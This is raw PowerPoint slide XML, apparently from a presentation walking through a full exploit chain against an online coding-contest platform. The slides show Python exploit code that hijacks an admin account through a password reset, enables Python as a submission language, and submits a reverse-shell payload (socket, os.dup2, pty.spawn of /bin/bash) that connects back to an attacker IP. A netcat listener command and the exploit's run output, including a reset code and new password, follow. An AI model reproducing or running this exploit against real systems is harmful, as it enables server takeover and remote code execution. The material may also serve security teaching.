        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2675185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add a problem to the contest </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29639" y="2477220"/>
            <a:ext cx="1013750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add_problem_to_contest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"problem"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problem_id</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contestid</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"/competition/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/mange/question/add"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json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data_json</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res.json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"Question has been added successfully"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == res[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>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The problem has been added to contest"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add problem to contest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E3FDA45B-DB53-45C9-AFE4-78088A8EF53F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3458075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subscribe to the contest so that we can submit code</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29639" y="2477220"/>
            <a:ext cx="1013750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subscribe_to_contest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contest_id</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"/competition/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/subscription/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contest_id</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"Successful subscription, good luck."</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res.text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Subscribed successfully to contest"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Failed to subscribe to contest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2D20734F-3E2C-4EE4-A135-90B1004226FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2939579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Finally, we wait for 10 seconds for the contest to start and then submit our malicious Python code using our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>do_rce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> function.</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729639" y="2540798"/>
            <a:ext cx="10137507" cy="375487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do_rce</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contest_name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problem_name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lang_id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When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lang_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == 1, this indicates that it's Python.</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"/competition/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/challenges/</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problem_name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headers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"X-XSRF-TOKEN"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: unquote(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.cookies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"XSRF-TOKEN"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=PROXIES)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    token = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get_csrf_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(res)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.post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target_url</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"/competition/</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contest_name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/challenges/</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problem_name</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files</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"_token"</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 token),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"language"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None</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"code"</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"test.py"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, OUR_RCE_CODE, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"text/x-python"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verify</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proxies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = PROXIES)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"The solution was not accepted due to: Time out"</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res.text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Our code should have been executed!"</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Our code may have not been executed :("</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E314714D-C71F-41A9-907E-3CD79EC68E5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339123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2787316" y="3020216"/>
            <a:ext cx="5887688" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Let’s dive in!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825D4E54-2FCD-4631-8F5B-5D8474FD674F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2230509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Our malicious code is a reverse shell that takes advantage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>multiprocessing</a:t>
            </a:r>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641408" y="2288135"/>
            <a:ext cx="10137507" cy="375487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OUR_RCE_CODE = </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from multiprocessing import Process</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def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>do_reverse_shell</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import socket, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>os</a:t>
            </a:r>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pty</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HOST = "</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PORT = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>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s=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socket.socket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socket.AF_INET,socket.SOCK_STREAM</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s.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((HOST, PORT))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os.dup2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.fileno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(),0)</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os.dup2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.fileno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(),1)</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os.dup2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.fileno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(),2)</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pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("/bin/bash")</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p = Process(target=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>do_reverse_shell</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err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p.start</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from time import sleep</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sleep(10)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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6CF3A4AC-00AF-4BBE-838F-26BC6C68D40A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3501946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707886"/>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We finalize our script with a simple command prompt that accepts a target URL and attacker IP and port for the reverse shell.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>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569219" y="3126335"/>
            <a:ext cx="10137507"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5</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"python3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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>target_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>admin_email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;"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"python3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http://172.16.238.100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>joe@omani.cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 172.16.238.1 9999"</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OUR_RCE_CODE = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OUR_RCE_CODE.format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rstrip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26A5E74E-841C-4240-B25B-A8A3C71425A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4042012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First, we will start a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>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528563" y="2408451"/>
            <a:ext cx="10137507"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nc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vlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 9998</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>listening on [any] 9998 ...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EBD7ED5-BB73-42B8-9A44-8E7DF864AA4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226140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Next, we will run our exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>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528563" y="2131990"/>
            <a:ext cx="10137507" cy="461664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python3 full_exploit.py http://172.16.238.100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>joe@omani.cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 172.16.238.1 9998</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] The password has been reset!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] Found password reset code: 140de9fef89f952fbd92098565f40f846e77e9e3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] The password has been changed successfully!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] The new password: 8930a3957eef8bd6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Logged in successfully!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Python has been added successfully as a Programming language!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Language has been activated successfully!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Created a test problem!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Extracting the problem's ID..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] Found problem ID: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Test case has been added!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] Contest has been created successfully!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
